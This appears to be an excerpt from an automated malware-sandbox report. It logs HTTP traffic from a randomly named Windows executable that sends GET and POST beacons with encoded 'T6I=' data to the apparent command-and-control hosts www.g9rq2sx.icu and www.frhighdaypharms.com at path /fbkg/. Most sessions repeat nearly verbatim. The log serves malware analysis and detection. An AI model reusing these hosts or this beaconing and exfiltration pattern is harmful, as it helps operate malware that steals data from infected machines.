                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:26:58.038204908 CET490INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:26:57 GMT
                                                                                                                                                                                                Server: Apache/2.4.57 (codeit) OpenSSL/3.0.10+quic mod_perl/2.0.11 Perl/v5.16.3
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                14192.168.11.2050141209.182.252.24580C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:57.855470896 CET489OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=kaJyhKmkPlgtKJtmmBfH2viQGZqK+66G0n0GrQsx6FyEW0DjSTzd6+/fE4wxwFlAMzIoBYsI873pRJak10YM5J9PGBdAXgKtow== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.frhighdaypharms.com
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:26:58.038204908 CET490INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:26:57 GMT
                                                                                                                                                                                                Server: Apache/2.4.57 (codeit) OpenSSL/3.0.10+quic mod_perl/2.0.11 Perl/v5.16.3
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                1538.163.97.880192.168.11.2050142C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:27:10.676583052 CET492OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.g9rq2sx.icu
                                                                                                                                                                                                Referer: http://www.g9rq2sx.icu/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 41 55 2b 33 58 4f 51 55 4c 78 4e 73 74 56 6c 4d 6a 4b 74 43 46 62 56 66 5a 61 58 57 50 50 73 72 79 34 58 52 4e 48 78 48 33 50 66 69 30 76 4d 6e 4c 67 6d 51 2f 73 59 42 66 62 73 57 6f 35 68 42 67 59 61 39 6f 73 43 6b 72 4c 47 46 34 70 5a 2f 39 38 37 37 47 6e 6b 73 35 55 2b 76 72 4c 46 4d 71 38 69 48 57 78 48 68 58 53 52 6c 47 43 43 4f 6a 6c 54 34 4a 47 38 37 5a 50 55 6f 58 72 73 56 56 62 39 5a 76 37 78 73 61 51 39 64 6e 4d 70 68 43 6b 41 47 55 38 37 6b 67 7a 49 49 68 55 33 69 66 58 48 76 6f 4a 44 7a 69 61 50 73 32 75 47 4b 67 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=CAU+3XOQULxNstVlMjKtCFbVfZaXWPPsry4XRNHxH3Pfi0vMnLgmQ/sYBfbsWo5hBgYa9osCkrLGF4pZ/9877Gnks5U+vrLFMq8iHWxHhXSRlGCCOjlT4JG87ZPUoXrsVVb9Zv7xsaQ9dnMphCkAGU87kgzIIhU3ifXHvoJDziaPs2uGKg==
                                                                                                                                                                                                Nov 17, 2023 19:27:15.140255928 CET495INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:27:15 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 90 cb 0a c2 30 10 45 f7 7e 45 c9 4a c1 24 28 0a 46 5a 41 44 0b 5a 51 b4 d2 a5 94 44 6c fa 48 6b 26 e2 0b ff 5d c1 8a 28 ae 5c b8 18 b8 f7 2e 0e 87 b1 81 6b 59 18 8b 47 a1 86 8d 71 d0 ca 1f e1 0e b2 a4 70 90 d7 5f 0f 66 9e 37 1c f8 c8 02 cd 1d 44 29 88 84 b4 1b 24 0d 69 0c f8 5e 70 a1 73 92 49 45 62 40 3d 9b 3e 60 bd 8a 5d 06 af 4f a4 92 a6 7a 91 a2 8b 26 6c 36 71 8d db 76 8b 71 a0 dd e1 12 d5 79 f2 65 bd d6 5e 9c 27 e8 2f 7a ad f9 71 2a 9a f1 2e 5d 4c 59 b0 48 4a bd cf f5 77 bd c8 98 02 ba 94 66 42 6d 0e 24 07 c0 5c e1 28 57 db e4 7e 24 4c e5 69 af 38 10 9e 67 d4 9c 19 63 ef 3f bd 01 81 7d 56 5b a9 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: d80E~EJ$(FZADZQDlHk&](\.kYGqp_f7D)$i^psIEb@=>`]Oz&l6qvqye^'/zq*.]LYHJwfBm$\(W~$Li8gc?}V[0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                15192.168.11.205014238.163.97.880C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:27:10.676583052 CET492OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.g9rq2sx.icu
                                                                                                                                                                                                Referer: http://www.g9rq2sx.icu/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 41 55 2b 33 58 4f 51 55 4c 78 4e 73 74 56 6c 4d 6a 4b 74 43 46 62 56 66 5a 61 58 57 50 50 73 72 79 34 58 52 4e 48 78 48 33 50 66 69 30 76 4d 6e 4c 67 6d 51 2f 73 59 42 66 62 73 57 6f 35 68 42 67 59 61 39 6f 73 43 6b 72 4c 47 46 34 70 5a 2f 39 38 37 37 47 6e 6b 73 35 55 2b 76 72 4c 46 4d 71 38 69 48 57 78 48 68 58 53 52 6c 47 43 43 4f 6a 6c 54 34 4a 47 38 37 5a 50 55 6f 58 72 73 56 56 62 39 5a 76 37 78 73 61 51 39 64 6e 4d 70 68 43 6b 41 47 55 38 37 6b 67 7a 49 49 68 55 33 69 66 58 48 76 6f 4a 44 7a 69 61 50 73 32 75 47 4b 67 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=CAU+3XOQULxNstVlMjKtCFbVfZaXWPPsry4XRNHxH3Pfi0vMnLgmQ/sYBfbsWo5hBgYa9osCkrLGF4pZ/9877Gnks5U+vrLFMq8iHWxHhXSRlGCCOjlT4JG87ZPUoXrsVVb9Zv7xsaQ9dnMphCkAGU87kgzIIhU3ifXHvoJDziaPs2uGKg==
                                                                                                                                                                                                Nov 17, 2023 19:27:15.140255928 CET495INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:27:15 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 90 cb 0a c2 30 10 45 f7 7e 45 c9 4a c1 24 28 0a 46 5a 41 44 0b 5a 51 b4 d2 a5 94 44 6c fa 48 6b 26 e2 0b ff 5d c1 8a 28 ae 5c b8 18 b8 f7 2e 0e 87 b1 81 6b 59 18 8b 47 a1 86 8d 71 d0 ca 1f e1 0e b2 a4 70 90 d7 5f 0f 66 9e 37 1c f8 c8 02 cd 1d 44 29 88 84 b4 1b 24 0d 69 0c f8 5e 70 a1 73 92 49 45 62 40 3d 9b 3e 60 bd 8a 5d 06 af 4f a4 92 a6 7a 91 a2 8b 26 6c 36 71 8d db 76 8b 71 a0 dd e1 12 d5 79 f2 65 bd d6 5e 9c 27 e8 2f 7a ad f9 71 2a 9a f1 2e 5d 4c 59 b0 48 4a bd cf f5 77 bd c8 98 02 ba 94 66 42 6d 0e 24 07 c0 5c e1 28 57 db e4 7e 24 4c e5 69 af 38 10 9e 67 d4 9c 19 63 ef 3f bd 01 81 7d 56 5b a9 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: d80E~EJ$(FZADZQDlHk&](\.kYGqp_f7D)$i^psIEb@=>`]Oz&l6qvqye^'/zq*.]LYHJwfBm$\(W~$Li8gc?}V[0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                1638.163.97.880192.168.11.2050143C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:27:13.569660902 CET493OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.g9rq2sx.icu
                                                                                                                                                                                                Referer: http://www.g9rq2sx.icu/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 41 55 2b 33 58 4f 51 55 4c 78 4e 74 4d 6c 6c 41 69 4b 74 46 6c 62 53 52 35 61 58 64 76 4f 72 72 79 30 58 52 4d 54 62 47 46 72 66 37 56 2f 4d 6d 4b 67 6d 54 2f 73 59 47 76 62 70 59 49 35 2f 42 67 6b 6a 39 73 6f 43 6b 72 50 47 45 4c 68 5a 33 74 38 6b 31 6d 6e 37 36 70 55 7a 35 62 4c 66 4d 71 78 4a 48 58 6c 48 69 6d 75 52 6b 45 36 43 64 6e 35 53 38 70 48 33 73 70 50 56 2b 6e 72 6d 56 55 6e 31 5a 75 43 54 73 73 77 39 63 48 73 70 67 43 6b 48 54 30 38 77 38 67 79 30 50 42 78 76 72 50 54 34 33 70 64 36 79 42 37 45 67 79 2f 4b 57 34 61 68 62 30 4d 56 75 33 63 52 38 30 37 79 53 73 32 47 4c 6a 70 78 32 64 59 4b 36 47 53 37 6f 30 76 75 47 62 73 73 66 46 71 69 39 36 5a 51 69 56 43 79 6d 4e 6b 64 41 63 36 43 2b 6c 6c 66 34 33 46 48 42 69 6b 6d 68 30 39 76 47 47 68 58 6e 48 45 45 50 4c 34 4c 68 79 64 31 61 44 6c 75 33 34 7a 46 56 48 55 2b 48 44 73 46 4a 63 5a 32 79 6e 45 4b 47 76 64 50 2f 6d 78 48 50 71 72 36 36 56 4f 46 48 62 47 4b 79 68 48 78 34 42 69 69 47 79 73 7a 31 32 55 33 78 4f 6b 69 72 33 6d 46 76 51 6c 38 72 2f 56 36 53 44 67 73 47 33 77 51 2b 45 64 77 31 38 72 67 59 43 73 4a 61 4a 36 41 2f 63 72 66 76 76 68 75 62 39 62 63 65 48 75 50 72 45 6c 32 44 4e 69 77 53 79 47 37 50 47 45 4b 68 77 75 43 72 4a 50 2f 35 4b 6f 54 76 4c 36 63 4d 74 6a 42 4b 33 74 46 72 6a 71 66 6a 79 44 4c 34 49 49 62 47 70 34 74 4f 35 4d 73 63 64 63 37 34 56 58 70 33 35 6c 61 63 75 70 42 41 52 49 52 36 57 44 32 2f 6a 45 4b 51 30 56 71 43 53 5a 6f 58 39 2f 37 32 38 30 57 70 4d 53 4e 70 69 4a 6a 52 69 71 73 62 72 39 43 39 42 65 39 42 44 43 39 44 32 36 39 30 34 6f 3d
                                                                                                                                                                                                Data Ascii: T6I=CAU+3XOQULxNtMllAiKtFlbSR5aXdvOrry0XRMTbGFrf7V/MmKgmT/sYGvbpYI5/Bgkj9soCkrPGELhZ3t8k1mn76pUz5bLfMqxJHXlHimuRkE6Cdn5S8pH3spPV+nrmVUn1ZuCTssw9cHspgCkHT08w8gy0PBxvrPT43pd6yB7Egy/KW4ahb0MVu3cR807ySs2GLjpx2dYK6GS7o0vuGbssfFqi96ZQiVCymNkdAc6C+llf43FHBikmh09vGGhXnHEEPL4Lhyd1aDlu34zFVHU+HDsFJcZ2ynEKGvdP/mxHPqr66VOFHbGKyhHx4BiiGysz12U3xOkir3mFvQl8r/V6SDgsG3wQ+Edw18rgYCsJaJ6A/crfvvhub9bceHuPrEl2DNiwSyG7PGEKhwuCrJP/5KoTvL6cMtjBK3tFrjqfjyDL4IIbGp4tO5Mscdc74VXp35lacupBARIR6WD2/jEKQ0VqCSZoX9/7280WpMSNpiJjRiqsbr9C9Be9BDC9D26904o=
                                                                                                                                                                                                Nov 17, 2023 19:27:14.320822001 CET494OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.g9rq2sx.icu
                                                                                                                                                                                                Referer: http://www.g9rq2sx.icu/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 41 55 2b 33 58 4f 51 55 4c 78 4e 74 4d 6c 6c 41 69 4b 74 46 6c 62 53 52 35 61 58 64 76 4f 72 72 79 30 58 52 4d 54 62 47 46 72 66 37 56 2f 4d 6d 4b 67 6d 54 2f 73 59 47 76 62 70 59 49 35 2f 42 67 6b 6a 39 73 6f 43 6b 72 50 47 45 4c 68 5a 33 74 38 6b 31 6d 6e 37 36 70 55 7a 35 62 4c 66 4d 71 78 4a 48 58 6c 48 69 6d 75 52 6b 45 36 43 64 6e 35 53 38 70 48 33 73 70 50 56 2b 6e 72 6d 56 55 6e 31 5a 75 43 54 73 73 77 39 63 48 73 70 67 43 6b 48 54 30 38 77 38 67 79 30 50 42 78 76 72 50 54 34 33 70 64 36 79 42 37 45 67 79 2f 4b 57 34 61 68 62 30 4d 56 75 33 63 52 38 30 37 79 53 73 32 47 4c 6a 70 78 32 64 59 4b 36 47 53 37 6f 30 76 75 47 62 73 73 66 46 71 69 39 36 5a 51 69 56 43 79 6d 4e 6b 64 41 63 36 43 2b 6c 6c 66 34 33 46 48 42 69 6b 6d 68 30 39 76 47 47 68 58 6e 48 45 45 50 4c 34 4c 68 79 64 31 61 44 6c 75 33 34 7a 46 56 48 55 2b 48 44 73 46 4a 63 5a 32 79 6e 45 4b 47 76 64 50 2f 6d 78 48 50 71 72 36 36 56 4f 46 48 62 47 4b 79 68 48 78 34 42 69 69 47 79 73 7a 31 32 55 33 78 4f 6b 69 72 33 6d 46 76 51 6c 38 72 2f 56 36 53 44 67 73 47 33 77 51 2b 45 64 77 31 38 72 67 59 43 73 4a 61 4a 36 41 2f 63 72 66 76 76 68 75 62 39 62 63 65 48 75 50 72 45 6c 32 44 4e 69 77 53 79 47 37 50 47 45 4b 68 77 75 43 72 4a 50 2f 35 4b 6f 54 76 4c 36 63 4d 74 6a 42 4b 33 74 46 72 6a 71 66 6a 79 44 4c 34 49 49 62 47 70 34 74 4f 35 4d 73 63 64 63 37 34 56 58 70 33 35 6c 61 63 75 70 42 41 52 49 52 36 57 44 32 2f 6a 45 4b 51 30 56 71 43 53 5a 6f 58 39 2f 37 32 38 30 57 70 4d 53 4e 70 69 4a 6a 52 69 71 73 62 72 39 43 39 42 65 39 42 44 43 39 44 32 36 39 30 34 6f 3d
                                                                                                                                                                                                Data Ascii: T6I=CAU+3XOQULxNtMllAiKtFlbSR5aXdvOrry0XRMTbGFrf7V/MmKgmT/sYGvbpYI5/Bgkj9soCkrPGELhZ3t8k1mn76pUz5bLfMqxJHXlHimuRkE6Cdn5S8pH3spPV+nrmVUn1ZuCTssw9cHspgCkHT08w8gy0PBxvrPT43pd6yB7Egy/KW4ahb0MVu3cR807ySs2GLjpx2dYK6GS7o0vuGbssfFqi96ZQiVCymNkdAc6C+llf43FHBikmh09vGGhXnHEEPL4Lhyd1aDlu34zFVHU+HDsFJcZ2ynEKGvdP/mxHPqr66VOFHbGKyhHx4BiiGysz12U3xOkir3mFvQl8r/V6SDgsG3wQ+Edw18rgYCsJaJ6A/crfvvhub9bceHuPrEl2DNiwSyG7PGEKhwuCrJP/5KoTvL6cMtjBK3tFrjqfjyDL4IIbGp4tO5Mscdc74VXp35lacupBARIR6WD2/jEKQ0VqCSZoX9/7280WpMSNpiJjRiqsbr9C9Be9BDC9D26904o=
                                                                                                                                                                                                Nov 17, 2023 19:27:16.954644918 CET495INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:27:18 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 90 cb 0a c2 30 10 45 f7 7e 45 c9 4a c1 24 28 0a 46 5a 41 44 0b 5a 51 b4 d2 a5 94 44 6c fa 48 6b 26 e2 0b ff 5d c1 8a 28 ae 5c b8 18 b8 f7 2e 0e 87 b1 81 6b 59 18 8b 47 a1 86 8d 71 d0 ca 1f e1 0e b2 a4 70 90 d7 5f 0f 66 9e 37 1c f8 c8 02 cd 1d 44 29 88 84 b4 1b 24 0d 69 0c f8 5e 70 a1 73 92 49 45 62 40 3d 9b 3e 60 bd 8a 5d 06 af 4f a4 92 a6 7a 91 a2 8b 26 6c 36 71 8d db 76 8b 71 a0 dd e1 12 d5 79 f2 65 bd d6 5e 9c 27 e8 2f 7a ad f9 71 2a 9a f1 2e 5d 4c 59 b0 48 4a bd cf f5 77 bd c8 98 02 ba 94 66 42 6d 0e 24 07 c0 5c e1 28 57 db e4 7e 24 4c e5 69 af 38 10 9e 67 d4 9c 19 63 ef 3f bd 01 81 7d 56 5b a9 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: d80E~EJ$(FZADZQDlHk&](\.kYGqp_f7D)$i^psIEb@=>`]Oz&l6qvqye^'/zq*.]LYHJwfBm$\(W~$Li8gc?}V[0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                16192.168.11.205014338.163.97.880C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:27:13.569660902 CET493OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.g9rq2sx.icu
                                                                                                                                                                                                Referer: http://www.g9rq2sx.icu/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 41 55 2b 33 58 4f 51 55 4c 78 4e 74 4d 6c 6c 41 69 4b 74 46 6c 62 53 52 35 61 58 64 76 4f 72 72 79 30 58 52 4d 54 62 47 46 72 66 37 56 2f 4d 6d 4b 67 6d 54 2f 73 59 47 76 62 70 59 49 35 2f 42 67 6b 6a 39 73 6f 43 6b 72 50 47 45 4c 68 5a 33 74 38 6b 31 6d 6e 37 36 70 55 7a 35 62 4c 66 4d 71 78 4a 48 58 6c 48 69 6d 75 52 6b 45 36 43 64 6e 35 53 38 70 48 33 73 70 50 56 2b 6e 72 6d 56 55 6e 31 5a 75 43 54 73 73 77 39 63 48 73 70 67 43 6b 48 54 30 38 77 38 67 79 30 50 42 78 76 72 50 54 34 33 70 64 36 79 42 37 45 67 79 2f 4b 57 34 61 68 62 30 4d 56 75 33 63 52 38 30 37 79 53 73 32 47 4c 6a 70 78 32 64 59 4b 36 47 53 37 6f 30 76 75 47 62 73 73 66 46 71 69 39 36 5a 51 69 56 43 79 6d 4e 6b 64 41 63 36 43 2b 6c 6c 66 34 33 46 48 42 69 6b 6d 68 30 39 76 47 47 68 58 6e 48 45 45 50 4c 34 4c 68 79 64 31 61 44 6c 75 33 34 7a 46 56 48 55 2b 48 44 73 46 4a 63 5a 32 79 6e 45 4b 47 76 64 50 2f 6d 78 48 50 71 72 36 36 56 4f 46 48 62 47 4b 79 68 48 78 34 42 69 69 47 79 73 7a 31 32 55 33 78 4f 6b 69 72 33 6d 46 76 51 6c 38 72 2f 56 36 53 44 67 73 47 33 77 51 2b 45 64 77 31 38 72 67 59 43 73 4a 61 4a 36 41 2f 63 72 66 76 76 68 75 62 39 62 63 65 48 75 50 72 45 6c 32 44 4e 69 77 53 79 47 37 50 47 45 4b 68 77 75 43 72 4a 50 2f 35 4b 6f 54 76 4c 36 63 4d 74 6a 42 4b 33 74 46 72 6a 71 66 6a 79 44 4c 34 49 49 62 47 70 34 74 4f 35 4d 73 63 64 63 37 34 56 58 70 33 35 6c 61 63 75 70 42 41 52 49 52 36 57 44 32 2f 6a 45 4b 51 30 56 71 43 53 5a 6f 58 39 2f 37 32 38 30 57 70 4d 53 4e 70 69 4a 6a 52 69 71 73 62 72 39 43 39 42 65 39 42 44 43 39 44 32 36 39 30 34 6f 3d
